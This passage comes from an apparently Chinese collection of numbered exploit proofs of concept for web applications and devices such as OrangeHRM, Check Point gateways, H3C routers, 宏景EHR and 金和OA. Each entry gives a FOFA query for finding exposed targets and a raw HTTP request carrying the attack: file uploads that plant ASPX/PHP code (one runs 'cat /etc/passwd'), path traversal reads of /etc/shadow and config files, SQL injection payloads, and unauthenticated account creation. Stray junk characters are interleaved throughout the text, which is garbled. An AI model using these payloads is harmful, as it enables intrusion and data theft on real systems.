* ^! z+ J2 _1 z- O* [第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 ?& p9 S* o+ B# w
POST /Webservice.asmx HTTP/1.1
3 z+ G* M) h( [( ~' ~4 e/ J( DHost: x.x.x.x  E, q0 c" }% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
3 M! X2 l% |9 }! K( e* [1 gConnection: close
- w( s2 [" q0 DContent-Length: 445) ~$ P6 {$ V" ?3 f
Content-Type: text/xml
. ]) A2 N. a# O7 k1 ~( XAccept-Encoding: gzip
: d$ N% O4 t% j- E# U
/ t* [. s* t/ S6 e8 y4 g5 ~<?xml version="1.0" encoding="utf-8"?># d7 }4 R9 O  P1 i" B0 g! S
<soap:Envelope xmlns:xsi="
' I( m2 l( T( {http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
2 n3 t+ A; ?. N% b$ _( l9 rxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 ?6 h' c/ G( a- ^: J
<soap:Body>2 r. o& h7 v( m8 n
<UploadResume xmlns="http://tempuri.org/">
4 c, p$ z- |# [<ip>1</ip>2 e0 p/ B6 I6 b0 O4 u
<fileName>../../../../dizxdell.aspx</fileName>
/ G5 r' D1 @8 d4 J6 Q3 q( @; ^<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
" x# k9 l+ F' t6 D: S<tag>3</tag>) ~3 Y9 j% e- K+ d2 W
</UploadResume>
: e9 }- i3 a' \$ O1 {! H</soap:Body>" }. |5 n7 t; r7 N9 t$ i
</soap:Envelope>
* G! u- B' ?2 ], k$ G9 P0 w
$ C; ^5 d; i, i. w/ F* j
1 O% v% @: d, [) `, p1 [; K% Shttp://x.x.x.x/dizxdell.aspx# R  c' i- ~' l

9 z# B! j( f1 m" e162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 R% H. N6 }# E) K" e6 |9 r. o" D5 g& a$ N
FOFA: app="和丰山海-数字标牌", L- h8 N2 h' \
POST /QH.aspx HTTP/1.1  u4 r7 [7 y, r: K9 O& }
Host: x.x.x.x, N9 \7 W; u8 {1 K# `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
% t8 a7 R1 F& }+ A0 O  UConnection: close7 A1 D5 F; K+ A- ~, Q3 u
Content-Length: 583+ K! Y8 O" Z9 B9 A, A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey$ C' k5 ?; M' u( W" P+ _
Accept-Encoding: gzip. E% c; N5 @6 M6 p$ N. I, Z% }
2 H. U+ W+ n6 C
------WebKitFormBoundaryeegvclmyurlotuey' ?& x; a7 I; B
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"! D& {0 ^$ d# K% t" J
Content-Type: application/octet-stream
( f: }. I/ o  v5 b3 {# x+ M; q
& O( Z* T- p; H: }: x; p6 V; ~<% response.write("ujidwqfuuqjalgkvrpqy") %>
# \1 a: v% [  f6 T------WebKitFormBoundaryeegvclmyurlotuey
3 A; u5 i) f# {, U2 C. ]Content-Disposition: form-data; name="action"
! T0 h  Y1 _8 a/ L  e7 |' J# M. j" A$ F# G. y3 O9 o1 G' Q5 x% r
upload$ S+ d* ^8 X) M2 i9 L6 c- Y
------WebKitFormBoundaryeegvclmyurlotuey
& u4 O- J0 c, O* UContent-Disposition: form-data; name="responderId"
' \+ y' z( `: f  u: q4 n) \* I4 T$ S4 U9 \, B' U/ {4 M" u# m
ResourceNewResponder8 W' T% W% j7 E1 K! n# T
------WebKitFormBoundaryeegvclmyurlotuey
' G, v4 X! g8 }. T. KContent-Disposition: form-data; name="remotePath"
) {; J9 a& N: |  n' o. @7 l5 g/ O' Z% _) e! D" o, K& U) ~
/opt/resources  X2 q' U! y4 ?& r4 C  v* E
------WebKitFormBoundaryeegvclmyurlotuey--
; }+ p* t$ L( U" e# I
( G% n) t$ X; o8 e8 p; c9 u- P2 {5 S. e( v2 ~8 D
http://x.x.x.x/opt/resources/kjuhitjgk.aspx9 K( R; h+ V& ~2 k/ d. B1 i
; w% U: l* {, k8 |
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# b* k/ k5 T- ~8 ]2 I1 FFOFA: icon_hash="-795291075"
& H# M( @! Q! JPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1+ o3 f9 h( m2 \
Host: x.x.x.x0 s/ _; F/ ^- A2 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
* A; R$ k1 i; i2 O' I# x8 O6 j) h" ~Connection: close
9 ~1 i0 Q4 F: h" m* G- b$ wContent-Length: 293
, S8 O# O! B. vAccept: */*
3 v+ z- j( X2 o: P& [, YAccept-Encoding: gzip, deflate3 X/ o3 n* h% ?8 f! b- ^! G7 U
Accept-Language: zh-CN,zh;q=0.9
4 N# p3 _# ~( LContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
% Y; Z# u, P& N( X6 W7 Z3 e2 p  d) d* J- y
------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 ?; B, ~: ?* n7 v& e9 ]$ D# n; ~: NContent-Disposition: form-data; name="name"
4 p, p) o) G2 S& z. r& c; T9 a' D2 H5 f' g5 t
1.php
4 \% D7 @' c* Y, L( Q, @9 N------iiqvnofupvhdyrcoqyuujyetjvqgocod2 ]1 W" e0 H- T7 m  H, s/ R1 \2 t
Content-Disposition: form-data; name="upfile"; filename="1.php"
* A# y8 o" t& ^% R1 wContent-Type: image/jpeg3 w0 o3 B& s5 t( E
2 b0 @7 G( S8 {- \& j5 x
rvjhvbhwwuooyiioxega
8 o/ K$ U6 |" v7 |------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 w9 l% D9 i/ y8 c' Q
& O% E4 d! |4 S0 M- g

- y# E" A# U/ ]' V164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) E$ `$ F" W- IFOFA: title="智慧综合管理平台登入"- x1 v0 ~  i* H2 `
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
/ p* T5 Q3 q% @1 aHost: x.x.x.x
" I( d6 ]( f' {* L- bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
! [4 n" d+ T! `1 w0 {+ p8 LContent-Length: 288
: _8 Z) u: t: BAccept: application/json, text/javascript, */*; q=0.01; h! _# q8 t/ C' e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
2 P& `, V7 n" R3 M: lConnection: close8 t2 M/ S( o' W
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
8 Q2 M$ \+ F+ M1 [( iX-Requested-With: XMLHttpRequest+ v2 K) J/ _6 M1 a
Accept-Encoding: gzip
& k$ [; n" Z) a& I+ P
9 h( R. L( T2 W: u$ Q. [9 j5 @! p' v1 i------dqdaieopnozbkapjacdbdthlvtlyl0 c& u3 f/ k6 \+ T- T
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"3 P0 o9 n5 Z+ r1 u* F- C
Content-Type: image/jpeg: c; ^* u7 I& R
( L  |2 N" q- l' q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>& p/ [0 @( \8 B' j1 D. y3 R0 y
------dqdaieopnozbkapjacdbdthlvtlyl--2 X$ {$ {' T& c9 l8 t

8 Y7 A+ l: l4 @9 a9 x. W/ j  g( R& o7 R- L6 S7 n6 g
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
8 P, X  a9 u7 k7 U% D+ P% e% B% Y; O8 V' y  F4 R8 C7 P2 B% b
165. OrangeHRM 3.3.3 SQL 注入. X7 F* V1 U3 w7 h
CVE-2024-364288 Q1 q: _' _0 ?. ]
FOFA: app="OrangeHRM-产品"' C" i4 `2 J6 c$ {; R
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
. l. }2 x( v4 v( L
7 F' J3 [& X- u9 y
; U+ j7 t; k5 a( P5 ~/ J# i166. 中成科信票务管理平台SeatMapHandler SQL注入5 O! V0 N/ f7 z  W# p3 R( x  ?
FOFA:body="技术支持:北京中成科信科技发展有限公司"0 y1 E, c3 `% e; k
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.19 @+ K3 q: _7 B' u3 C& N7 ~+ m5 P
Host:' P* Z* v+ M& f+ r
Pragma: no-cache3 R( r% f6 B7 C- o3 ~. I
Cache-Control: no-cache
. M8 `+ d0 t& N5 vUpgrade-Insecure-Requests: 1
( P6 O  |1 X1 ?0 a0 H2 A6 J) dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
! M% N7 _+ m+ H( TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. T; ?7 {$ Y: H1 W) W1 o- y
Accept-Encoding: gzip, deflate1 q; e/ T3 k) X, Z7 ^) c: Q# n9 r5 B
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
" `6 q  H8 U# A; ^2 o9 cCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE) D8 `4 Z. t7 ^$ [" h1 S
Connection: close
& n$ q8 {. ~8 D# b8 fContent-Type: application/x-www-form-urlencoded
* ^# q/ i3 @; {! q; @& X. c$ G$ v  bContent-Length: 89- _) b/ h. y4 u$ @

/ w' T. k  J6 y/ V3 X9 @Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE/ n: g5 U9 z/ P" g

, G  P3 V$ `. {+ z+ T* O. G8 W7 t9 X. ~
167. 精益价值管理系统 DownLoad.aspx任意文件读取7 }; w4 F3 w  H! B
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
6 Z& B: _2 z' ?& N$ v% ~6 pGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
* ~1 L, E: H# sHost:: ]& F& O; {  \5 N# e& w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" v1 ~# f' L4 f) s
Content-Type: application/x-www-form-urlencoded& l7 W9 P0 @) i3 V
Accept-Encoding: gzip, deflate
: D4 [. M, v6 D* z  _& @) MAccept: */*
( T( c1 V6 s9 i. K1 Q) RConnection: keep-alive0 p9 Y) Z7 o; y& G8 {( S9 [
; s! @: n( ]' i# c- Y7 J

3 o) o/ @; t9 k; X, S; B168. 宏景EHR OutputCode 任意文件读取
$ h: ^: R8 J. g5 Y  P/ yFOFA:app="HJSOFT-HCM"+ {, O+ y; E; M/ B" E8 ~
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
2 `) w. Y/ N/ U: Y, bHost: your-ip/ M* d4 B! O( t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
$ B5 `; M# ]; q) c' Q  s% `Content-Type: application/x-www-form-urlencoded, a& W' u3 ]2 m
Connection: close
/ I8 w& U/ S) Q5 I' {- X- Z3 n% x4 M: g" R# d% I

4 x" t5 ^, {+ S- y7 ~- h) p; {$ l' h: p0 `+ [  f
169. 宏景EHR downlawbase SQL注入# h: s! g9 U$ |# V4 m
FOFA:app="HJSOFT-HCM": e9 y" A; C8 r) z
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1( H- V  D0 ]7 j
Host: your-ip
; n$ }: a1 v3 ?- s2 f9 ~1 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; {8 p( N. l, q9 cAccept: */*/ q0 H( [+ \' k- X. s+ P
Accept-Encoding: gzip, deflate
0 c8 |8 o  l" v/ n& I7 t- WConnection: close! {- Q; T$ H. ]$ e* ?; z. x$ i

+ |3 j! E- b0 ]2 ^! u  K6 e# V! N: Y# N+ Q* H. F$ [# t( d% f7 D
0 \+ S3 M: B% {, y$ R1 P
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 ]& O/ B9 }4 E  {FOFA:body="/general/sys/hjaxmanage.js"
) ~  c2 \7 v4 g. H2 ]9 mPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.18 A1 z: [5 ]- Y+ Z" P; j
Host: balalanengliang- I/ }  z- a$ s! l4 }  U* w* `
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ t- V; ^8 e! Q$ r' }7 L9 KContent-Type: application/x-www-form-urlencoded
( p( x* P$ m0 F0 Z# M! @" g
+ A/ p) I+ [; R; e2 Cfilename=../webapps/ROOT/WEB-INF/web.xml) E& d/ r. X1 [6 i% v3 \% P
0 ]8 e; d2 G0 q- ^
, y7 ]" v% _5 n7 \" }1 O3 n: t
171. 通天星CMSV6车载定位监控平台 SQL注入
; F- b' {: w) z# t# R0 kFOFA:body="/808gps/"
' X6 ~. G# Q" `, o9 vGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1+ F8 n) \) L5 P, Y0 ?
Host: your-ip7 {! k' D+ A% k* ~' O0 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
' o6 H) T6 L( U3 S% I. [- O8 wAccept: */*
- R" Y2 f3 E. y/ P& V3 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, h2 C2 N( P# l' S
Accept-Encoding: gzip, deflate$ u) e, [( J, W
Connection: close5 {' A, u; l3 o2 C+ I& {

- i" |: M# o" ]2 e) f& m/ c3 Z8 M' P5 F* e0 J

. F( i  e0 E2 l- b172. DT-高清车牌识别摄像机任意文件读取& g' A- B  S! Z' p
FOFA:app="DT-高清车牌识别摄像机"4 R" W1 |( h4 u( G  M
GET /../../../../etc/passwd HTTP/1.1- z# S3 p, I/ {+ h# t
Host: your-ip
6 D5 n# j4 e4 _6 z1 M/ M# K! tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 y& M9 }0 j8 k5 eAccept-Encoding: gzip, deflate4 X; Y1 R* q) k% K' b  n
Accept: */*
% b9 g) H* |" z6 V/ s- @Connection: keep-alive, W+ D2 u5 {% V/ `, }: [+ e/ y

2 T& n% p, g0 @  ~; ^: f5 U: V3 @1 i2 b
1 d5 g2 P3 z+ ^) a
173. Check Point 安全网关任意文件读取
* f- G7 P( X5 E6 R- ~* rCVE-2024-24919
, _" P* |; ^% V# Q( L) z0 aFOFA:app="Check_Point-SSL-Network-Extender"
$ h  D" |- ^  ]8 j$ A4 a2 qPOST /clients/MyCRL HTTP/1.1# g( L. A) E, e& r5 @0 {! f$ w
Host: your-ip
/ t+ U. J9 W6 }' `! fContent-Type: application/x-www-form-urlencoded4 y4 p( L3 C( X2 s8 R& t

# r. a$ d" h- ^6 n9 h& m$ waCSHELL/../../../../../../../etc/shadow$ V+ w9 V$ t4 m  Z6 q% Q5 Z. O5 F

4 p8 f: v) O8 L: w' X# T/ T- S) U
% l  D3 Q7 i& w+ k" T% m
9 }3 F5 A6 ^3 S% W: v174. 金和OA C6 FileDownLoad.aspx 任意文件读取
4 l( m8 @3 t) z' NFOFA:app="金和网络-金和OA"
6 e7 F$ ^4 N( |: Z. B+ qGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
# j7 }8 _/ C! S, W) o+ K  u5 dHost: your-ip
  L# W2 o- v2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ [+ S. V4 x4 S6 W# q9 m7 s8 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 G) W5 \; L4 q& ]2 L. W' p
Accept-Encoding: gzip, deflate, br
. A7 E6 O( ^3 X/ x! CAccept-Language: zh-CN,zh;q=0.9- c1 {& u$ C+ S& f$ I) `
Connection: close
/ \% q) S' S/ n* h/ Q
5 P9 w7 [1 T9 ^* l  D6 T
& }# j8 ?/ z1 t+ b, `) ~3 V
( T( O; w8 D1 Z, x+ d; R6 W5 z$ g! d175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
: d0 w. S& q2 E4 M3 l# `; rFOFA:app="金和网络-金和OA"& x( Z9 @* ^: x# x, Y9 Y7 r
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.18 S. p& w( c1 n3 `* S
Host:) Q3 l2 c1 C8 q. \  j0 I" z
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  K' E/ E* U% s, x' T6 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ f3 d/ r6 k2 f& I1 y7 t' ]- V- o4 T& }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# i. \$ E# X0 P' _! ]( P2 U
Accept-Encoding: gzip, deflate* c4 H9 M, A& ^" B. b; s4 M
Connection: close
' u1 U# d  o) Z7 [3 h& u6 wUpgrade-Insecure-Requests: 1
# Y& z: y* |2 U8 r! T! ~; @9 s- @# S: Q2 }. w1 y! K
$ V8 {: p. `2 e$ _
176. 电信网关配置管理系统 rewrite.php 文件上传
" |+ S, n0 g5 q+ |. A9 nFOFA:body="img/login_bg3.png" && body="系统登录"
5 {" |* t: o8 f2 E8 }& dPOST /manager/teletext/material/rewrite.php HTTP/1.1. K2 O& w; A% h. L/ b6 `* y
Host: your-ip
. t9 j) g# c, S* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ B* s5 Y3 I: L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT2 I& i* S5 J% n" }
Connection: close
  ?6 U! O5 Q- O/ u2 z2 ?7 G, p# E8 h# D( o
------WebKitFormBoundaryOKldnDPT  d6 I8 u+ |8 D; Z8 h
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
; l- H, E' q! u/ j9 x- A' l7 |Content-Type: image/png
2 Y8 h+ X0 I) y: B & Q0 x/ \  q# O0 G- j; f
<?php system("cat /etc/passwd");unlink(__FILE__);?>
* U( N: S2 J8 C------WebKitFormBoundaryOKldnDPT" h$ n! A& W) U+ i
Content-Disposition: form-data; name="uploadtime"8 J8 Q: `8 V! S. x7 m; x

& h0 A$ Q8 `) Z1 y
7 H6 s. S9 ^1 ?. q# k, D' @- o  Z------WebKitFormBoundaryOKldnDPT--3 u3 e: r; a! Y$ o3 e$ @' M" i& D. N9 E

0 S# h0 B' i: @$ |8 }  t2 d
0 Q+ Y( O  h6 f* E, T
  E8 \' T( J& o5 K6 \$ Z177. H3C路由器敏感信息泄露9 {% I( `  x# |9 e
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' r0 w# g. O9 i8 s! f% q# h4 X
/userLogin.asp/../actionpolicy_status/../M60.cfg
9 Q/ [& E5 x; O: b0 L9 ~* Z/userLogin.asp/../actionpolicy_status/../GR8300.cfg2 W% ?, T# d( U% {  L7 K. t
/userLogin.asp/../actionpolicy_status/../GR5200.cfg5 m. l' K  Z+ k
/userLogin.asp/../actionpolicy_status/../GR3200.cfg6 w6 o. B5 J" j2 T) p
/userLogin.asp/../actionpolicy_status/../GR2200.cfg( ?* k3 w+ s* A* p2 _
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
- a3 C* K3 k$ W2 s2 D% \3 _+ D+ Q/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ b' c0 z  J8 d' S+ ?4 q) Q
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg% [6 }3 H$ v) H% g7 v+ G
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
( \4 n( T( m. u6 J5 R5 J/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 i" ~0 c4 A; F8 y# E: ~+ N/userLogin.asp/../actionpolicy_status/../ER5100.cfg
, K" Y8 Q8 d1 o, t: h+ a5 A/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg5 i+ ^  x+ J4 f' N
/userLogin.asp/../actionpolicy_status/../ER3260.cfg2 \: H) d: w0 |2 y* t
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
, f2 }3 v) v2 W' C+ i/userLogin.asp/../actionpolicy_status/../ER3200.cfg4 j8 a, F! d% \3 `2 t
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg4 |/ B* ~7 r, ]0 d1 |. X
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg  i6 o3 t6 c" l3 K3 ^3 X
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
9 W+ Z# W, K* ^: f  N/userLogin.asp/../actionpolicy_status/../ER3100.cfg3 B+ j) j! m2 S* a( u1 N2 Z- E
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg/ d5 p+ y3 q' Z" D+ {& I2 b1 F

" o6 y6 B5 s/ X, R! ?: U, `2 a6 ~9 @' V7 K- {
178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 @3 P: I: w: v( O$ Z5 J
FOFA:header="/selfservice"- ^/ k- R' d3 F' N
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1% `( \1 J1 w8 b6 t) e- s- j
Host:* a8 @5 d6 V; \+ w. K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; U  ?, }+ \4 ^
Content-Length: 252; F6 ~: u+ W6 x' H1 q4 K: k
Accept-Encoding: gzip, deflate
/ F. t/ p+ t9 C$ o8 t! y+ R6 ?7 rConnection: close
7 v9 c8 M# v. e: ~! l9 ~# MContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l% Q* H1 S: ~; g; U
-----------------aqutkea7vvanpqy3rh2l2 `* F8 x# p5 ~
Content-Disposition: form-data; name="12234.txt"; filename="12234"% i' D& u4 w3 ^' X  t% E$ F
Content-Type: application/octet-stream* i( a% {0 p) F% R. l3 c
Content-Length: 255) S& y2 i3 [) O2 F! m$ O$ E
/ L6 l4 K" n, ]( }& x
122340 W) c7 o3 ?, W( p$ `- k
-----------------aqutkea7vvanpqy3rh2l--
: O( d) B% _- @, o" R7 r1 N( V  G, B& a! N. j1 \7 h

& R. D5 ^' P: p* ?GET /imc/primepush/%2e%2e/flex/12234.txt
, z6 M7 A. X) r& w2 ^
- A  R* ~4 i) M/ Z2 }! E$ `. |$ J8 y$ m" q
179. 建文工程管理系统存在任意文件读取
3 C4 v4 @! M5 m8 ]POST /Common/DownLoad2.aspx HTTP/1.1) i' u! m, b. M" D
Host: {{Hostname}}
; @3 L8 r8 x6 i0 K/ t* Z- a0 M+ vContent-Type: application/x-www-form-urlencoded
5 T( Q0 l/ j* {* o; |, Y- DUser-Agent: Mozilla/5.0
: p8 u- B6 [6 `# D- J$ `( g: n: q
& P4 i  C0 I! W- G6 T# L. e, g. {path=../log4net.config&Name=
7 v1 y8 D* O- @  N1 E) S8 ?% _- J0 R" K' u

" u: F# ^; s) P9 B  G! E180. 帮管客 CRM jiliyu SQL注入$ `, S% Q" B+ U6 a/ w" J
FOFA:app="帮管客-CRM"6 d% s, a* @; H3 I
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
& Q' r8 _8 C, F! R/ S# CHost: your-ip3 ?, W; O+ ^" H9 d+ T% K9 L* f: f3 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& @0 t- ]: a4 k* a9 ?. g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ t, f. I( w0 Q0 X5 z& o
Accept-Encoding: gzip, deflate
. r" t& x' v. ~) h. T6 _Accept-Language: zh-CN,zh;q=0.9
) s- R* r) Q0 }0 \' [4 I, }, fConnection: close$ r; e' C3 n' p5 V& ^0 S

: K( `  \% l& x1 p" Q( U# V* }* \. B1 q  N9 z
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
8 T0 O. g% T% q( M/ VFOFA:"PDCA/js/_publicCom.js"
9 J! A7 t! F4 u; B, O; l$ BPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1) A% g6 [3 y" S4 t- x: i# \7 v
Host: your-ip
: D/ G9 |" \9 ?( V6 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 _2 h, g+ E( a" n6 a6 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. d5 V( g; l! s$ ~8 K9 a. I2 W% OAccept-Encoding: gzip, deflate, br7 |: V5 u5 A% u5 `( b! f/ W
Accept-Language: zh-CN,zh;q=0.9
2 _/ K4 q; p  {( b2 P& OConnection: close( ?" m$ Y: U9 Z6 U2 g
Content-Type: application/x-www-form-urlencoded; J/ O5 l" Q: J( ]$ ~

" j" R" K+ {$ G8 f5 J
- v9 |- S% b. j& qaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=205 V1 ], T4 M- {, N  O4 j5 m
6 {' d% e7 @% e4 _# U
  |% V6 D$ m5 A
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 _5 |1 I( S' a1 x6 i
FOFA:"PDCA/js/_publicCom.js"
/ d5 ^3 z/ T! p$ l- o8 a8 jPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.18 N& S' x2 ]2 R8 e9 g( `
Host: your-ip
9 I! k7 }, @4 `- p8 `$ s2 c9 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 {5 `( d/ ?3 t9 T) |7 m" q) _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 d5 }& l* f) F, T. a  w1 @9 B: ^Accept-Encoding: gzip, deflate, br
7 r( ^& b4 X  Q! i8 f, b$ r8 kAccept-Language: zh-CN,zh;q=0.9, G  g6 k9 s" |1 q% H
Connection: close! O1 O9 |; v. x# W' S( l+ F
Content-Type: application/x-www-form-urlencoded9 r0 k' E, K' P+ M/ g* u
/ f# f2 ]6 X, L9 Z9 Y0 X
+ {# R- B- L$ c' F$ W# y
username=test1234&pwd=test1234&savedays=1  {( H2 A' }) j4 d( g0 A/ @) D

3 h" g3 [1 c- v$ Q8 A$ m% }, a+ w0 _8 I* u
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# e; |. G7 K( j; A& D3 E, M' a
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"! d; F) e3 l4 I( I: F
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1' n; c# d3 v8 T2 M" C
Host: your-ip% ^7 r% X1 G% q) z) U: X; a
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ n1 b, c/ S) m3 A' D
Accept-Charset: utf-8
$ G1 G6 A! Z% {) x' L2 ]Accept-Encoding: gzip, deflate) X3 {6 H* h6 p
Connection: close) r7 X. q0 V1 d0 s' d- M5 Z

5 o- |! ?1 J/ W7 T
